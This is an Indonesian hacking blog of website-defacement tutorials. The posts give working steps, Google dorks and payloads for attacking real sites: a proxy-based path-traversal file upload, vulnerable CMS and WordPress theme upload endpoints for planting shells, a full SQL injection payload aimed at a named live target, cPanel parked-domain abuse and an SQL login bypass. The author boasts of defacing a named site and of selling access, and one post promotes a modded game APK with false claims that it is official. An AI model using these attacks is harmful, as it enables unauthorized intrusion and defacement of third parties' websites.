Kamis, 10 Oktober 2019

Deface Slims Repository With Sandroproxi & Lighting Browser

on   with Tidak ada komentar
Tutorial Deface Web Menggunakan
Sandroproxi & Lighting Browser


Seperti janji gw kemarin gw kasih akan tutorial deface web menggunakan Sandroproxi.. apasih maksudnya ? Jdi gini saat kita deface menggunakan metode slims repository kita kan manggilnya http://target.com/repository/file_kita .. lah kalaw pke sandroproxi kita lngsng tembus ke web utamanya.. gampangnya pindah path lngsung ke http://target.com/file_kita .. gosa lama".. siapkan bahannya sandroproxi dan lighting browser download diplaystore ada.. kalau otak kalian puter kalian akan nemuin fungsi lain dari 2 aplikasi ini selain pindah path... PKOKNYA JAN KBNYKN NGODING.. PECAH KEPALA IYA PINTER KGK :v

Disini gw gk akan jelasin lagi gimana cara deface Slims Repository karna udh ada diblog gw.. Klik Sini Kalaw Mau Baca

Lngsng menuju tutorial buka sandroproxi kalian trs pilih bagian yg gw lingkari kemudian "done" untuk menjalankan


Langkah kedua buka Lighting browser kalian.. Pergi ke setting -> masukan ke general setting -> kemudian ubah HTTP proxi dari none ke manual -> setting jadi localhost:8008





Kalau sudah saatnya eksekusi buka target kalian dilighting browser.. kemudian upload file txt kalian..


Setelah kalian upload file kalian buka sandoproxinya lagi cari bagian POST http://webnya.. teken agak lama ntar muncul tulisan kek gambar dibawah pilih "manual request".


Kemudian cari bagian "fileDir" ubah menjadi "../../" . liat gambar dibawah kalaw g paham..



Terakhir tinggal send aja teken gambar panah diatas sebelah kanan..


Duarr tinggal kita liat hasilnya.. http://target.com/file_kita.. and btw target gw barusan ini web "himpunan mahasiswa komputer tuban".. aoskwowkwok mon maap yg anak tuban.. buat bljr aja kok :Vv..



Thanks for reading.. jangan lupa !! 
#share and coment
#see you in next post
Share:

Selasa, 08 Oktober 2019

Deface Poc Mlm Cms Mistake New 2019

on   with Tidak ada komentar
Tutorial Deface Website 
Metode MLM CMS MISTAKE

Pagii , Pagi ini gw mau kasih tutorial deface website menggunakan metode cms mlm mistake ,, bisa dibilang ini metode baru dan mungkin masih jarang orang yg mengetahuinya,, Gw nyoba di sini karna ngangggur dan work ,, cmn dorknya aja blm dikembangin,, Sumpah gw gabut banget di tempat magang,, And btw gw dipindah dari tempat magang gw yg dulu ke tempat magang baru,, tempatnya kek wedding (desain" , ngedit , and anak MM lah intinya),, Dan gw ngerasaa ahhhh ydh lah,, Mending deface kan yaa ,, nyari akses --> jual --> buat jajan :v ,, ok lngsng aja kita stop ngomongnya & menuju tutorialnya ,

Dork : inurl:/index.php?m=depan (kembangin)

Exploit : site.com/admin/banner.php

Aksesnya : site.com/images/banner/file.kalian

Seperti biasa kita dork dulu digoogle ,, pilih salah satu


Kemudian Tambahkan exploit di belakang webnya ,, Kalau ada tempat upload berarti vuln, 



Kemudian upload shell kalian,, ditarget gw ini gak support .php jdi gw cuman upload gambar doang,, 


Last tinggal akses aja file kalian site.com/images/banner/file.kalian  ,, and happy deface,, kembangin dork biar dapet web yang suport upload .php ,, 


hwhwhw segini dulu,, next gw akan bagi tutorial deface website pindah patch menggunakaan sandy proxy ,, tunggu aja ,, thankss for reading

#share and coment
Share:

Deface SQL Injection With Dios

on   with Tidak ada komentar
Tutorial Deface Metode SQL With Dios


Ok skrng gw akan kasih cara deface menggunakan metode SQL with dios,, Kan ditutorial gw sebelumnya gw pernah share deface SQL dengan termux , SQL into outfile, dll,, Caranya sih lebih gampang ini karna kita cmn perlu ngeluarin angka togelnya dan auto nge-dump dengan dios,, Untuk dorknya bisa kalian cari digoogle ,, Disini gw udh ada live target jadi gk ush dork lagi :v,, Bisa juga kalian pke live target gw buat bljr,, Tapi jangan di up shell or diindex yaa anjg :v,,

- Live Target : http://cmc.org.kh/our_program.php?id=11

- Dios : make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Pertama kita buka target kita kemudian tambahkan string di belakang websitenya (') ,, Setelah diberi string pasti error webnya 



Kemudian kita tambahkan order+by+angka--+- ,, Cari sampai gk error,, 


Lah di angka 10 masih error coba kita turunkan 1 angka lagi,, 


Uda kembali lagi webnya itu artinya columb web nya cuman ada 9,, kemudian setelah itu kita tambahkan +union+select+angkanya--+-,,


Ini adalah langkah akhirnya ,, Setelah union+select pasti akan muncul angka togelnya ,, angka togelnya inilah yg kita dump,, target kita kan 2 dan 6 ,,  skrng tinggal masukan DIOS nya aja dibagian 2 atau 6 nya ,,  

Jdi Seperti ini kalaw yg didump angka 2 nya : http://cmc.org.kh/our_program.php?id=-11+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9--+-

kalaw nomer 6 nya : http://cmc.org.kh/our_program.php?id=-11+union+select+1,2,3,4,5,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),7,8,9--+-


Tinggal dump u&p nya,, kemudian hash passnya,, cari adlog dan duarrrr happy deface

Thanks for reading
#share and comment
Share:

Senin, 07 Oktober 2019

Deface Website Aliases Domain

on   with Tidak ada komentar
Tutorial Deface Metode Parked
Domain (Aliases Domain)


Yah anjay gosa panjang lebar yaa.. kalian juga mesti skip" .. gk pernah baca pembuka or penjelasan gw.. intina skrng kita akan bljr deface website menggunakan teknik parked domain ada juga yg nyebutnya aliases domain ada juga yg nyebut bug cpanel, terserah lah.. pnting deface website:V".. 

Pertama kalian harus ada target web yg udh kalian crack cpanelnya.. kemudian upload file kalian di /public_html/


Kedua kalian reverse ip dulu target kalian Klik sini .. ingat waktu masukin web kalian gosa pke http.. cukup web.com saja kemudian go



Selanjutnya pasti akan muncul web yang memiliki dns yang sama.. tinggal pilih satu target yang kalian inginkan.. jika sudah masuk kembali ke cpanel cari "aliases" lalu klik.. 


Setelah itu masukan target kalian.. 
NB : wajib ditambahkan "blog / web / terserah" didepan target kalian



Terakhir tinggal kita liat .. wajib ditambahi /filekalin dibelakangnya.. kan mirip redirect.. di public_html gw .. gw kan uploadnya ez.php


Done gan.. kurang paham? Bisa contact waku
083831973261.. thankss

#share & coment
Share:

Rabu, 02 Oktober 2019

Deface Website Wordpress Themes Cameleone

on   with Tidak ada komentar
Tutorial Deface Website Metode
Wp-themes Cameleone


Assalamualaikum 
Pada kesempatan kali ini kita akan belajar deface menggunakan metode wp-themes cameleone.. gw bisanya cmn upload script kalaw pke nih metode.. law upload shell mesti kedownload kalaw enggk yah not found waktu diakses.. kalian akalin aja buat ext upload shellnya (php5 .php.fla .phtml dll) .. cara nya sama aja kok upload shell atau upload script.. lngsng aja : 

1. Dork :
inurl:/wp-content/themes/cameleon (kembangin)

2. Exploit :
site.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

3. Csrf (file postnya : qqfile)
Gak punya csrf? Touch Sini

Langka pertama seperti biasa kita dorking digoogle


Cari web yg vuln.. cirinya adalah ada tulisan {"error":"No files were uploaded."} Setelah diberi exploit


Kemudian pergi ke csrfnya.. isi url dengan target.. postfile isi dengan "qqfile" .. lalu kunci target


Setelah kunci target akan muncul tempat buat upload file.. upload sc/shell kita.. kalaw sukses seperti ini penampakan nya


Last tinggal diakses aja filenya.. caranya? 
site.com/wp-content/uploads/tahun/bulan/file.kita


Done.. thanks dah mampir.. jan lupa 
#share & coment

See you in next post
Share:

Rabu, 25 September 2019

Update ML Unity 2.0

on   with Tidak ada komentar
New !! Update ML Unity 2.0 
Auto Win !!


Cara Download ML Unity 2.0 :

1. Buka link berikut dan download file ml nya Sini senpai


2. Setelah download install file mobile legend nya .. 


3. Kalian gk ush takut+gelisah karena ini aplikasi 100% dari moonton .. dan data di ML kalian gk akan di restore..

4. Last.. buka kembali mobile legend kalian .. dan rasakan sensasi baru :V.. 

Gw kasih penampakan dikit ya : 



Wkwk okok segini aja dari gw.. maap post tutornya jarang" soalnya sibuk magang :V"..
Thankss
#share and coment
Share:

Jumat, 30 Agustus 2019

Deface SQL Without Quotes

on   with Tidak ada komentar
Cara Deface Website Metode SQL 
Without Quotes


Ok,, Pagi semua,, Kali ini gw akan kasih tutorial deface menggunakan metode sql without quotes,, Yah bisa dibilang metode baru karna jarang blog atau yt yang membagikan deface menggunakan metode ini,, gw liat dichannel nya orang barat,, cara sama sih kek bypass ('=''or) atau bypass sql login (or 1=1 limit 1 -- -+) cmn nyari targetnya aja agak susah,, ok langsung aja ga ush lama lama

Dork : Powered by SHODH TECHNOLOGIES (kembangin itu dork default nya)

Login : admin / web-admin

User : \
Pass : ||1#


Langkah awal ngedork dulu digoogle kek biasanya sambil ngopi biar makin voss ,, btw yg gtw masksud ngedork itu gini gw jelasin, ngedork itu = nyari target website yg bisa kita dideface,,


Langkah kedua pilih salah satu website tambahkan /admin or /web-admin untuk loginnya 



Kemudian masukkan user dan password yg gw bagiin diatas 

U:\
P:||1#



Niscaya kalian akan masuk dashboard admin, disini gw akan add berita aja ga akan tanem shell trs rusak,, kasian adminnya juga,,



hehehe done om,, klik sini om hasilnya
happy hacking deface page,, kalaw mau tanem shell trs index jangan lupa backup ler,, 


#share and coment 
#see you in next post
Share: